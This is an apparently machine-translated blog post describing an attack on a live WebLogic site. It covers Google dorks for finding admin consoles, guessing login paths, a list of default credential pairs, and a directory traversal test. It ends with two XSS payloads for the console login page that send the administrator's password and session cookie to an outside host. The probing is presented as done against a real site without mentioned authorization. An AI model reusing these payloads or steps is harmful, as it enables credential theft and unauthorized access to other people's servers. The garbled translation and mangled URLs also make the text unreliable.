Web security practices (10) attack weblogic

Web security practices (10) attack weblogic

This is a small experiment I spent more than two hours doing. I detected only one website and didn't systematically perform overall security analysis on WebLogic. Click it.

Body

1. Search for WebLogic Methods

(1) use the platform identification method we introduced earlier to identify whether it is a WebLogic Server.

(2) Google Search

Keyword "WebLogic Server inurl: console". The URL is followed by the end of the console, which is generally the WebLogic Serve management backend entry.

If you do not enter the management interface, you can add the console method after the target URL, and press enter to automatically jump to the management logon page.

Guess the path of the management interface, such as login/LoginForm. jsp.

We can also use crawling programs to download the website directory, so that we can easily determine the specific location of the logon interface.

 

 

Ii. Analysis

(1) Test the default password

The default passwords include the following groups:

1. username and password: weblogic

2. username and password: system

3. username and password: portaladmin

4. username and password: guest

If you cannot log on after trying, you can use the username and password. For example, if the username is weblogic and the password is system, you can flexibly change the password. Of course, you can also create a dictionary file. However, I have not been able to use it for a long time.

(2) Verify url input

 

Bea weblogic has a security vulnerability in the Windows platform, which allows attackers

 

To obtain the content list of the web directory.
For example, I enter/http://www.cnblogs.com/../ at the URL below

Result:

The homepage is displayed. This indicates that the website does not filter url input.

 

(3) view the form

This information caught my attention when I checked the client source file:

The form for transferring the user name and password is j_uername and j_password respectively. The cross-site scripting vulnerability has been tested.
The j_username and j_password parameters on the BEA WebLogic Console Logon page have a cross-site scripting vulnerability. Attackers can trick legitimate Web applications into sending malicious code to undefended end users, generally, a hyperlink embedded with malicious script code is created. A valid user may click this link because it seems to point to resources in a trusted domain. If you click this link, attackers can execute the Code provided by attackers, which may steal the Administrator's session cookie.

Similar to the statement given below, the statement is successfully executed.

Steal administrator password
Http: // dd/console/login/LoginForm. jsp? J_password = "" onBlur = "window. open ('HTTP: // xuanhun/'% 2Bdocument. all. j_password.value )"
Session cookie Theft
Http: // dd/console/login/LoginForm. jsp? J_password = "" onBlur = "window. open ('HTTP: // xuanhun/'% 2Bdocument. cookie )"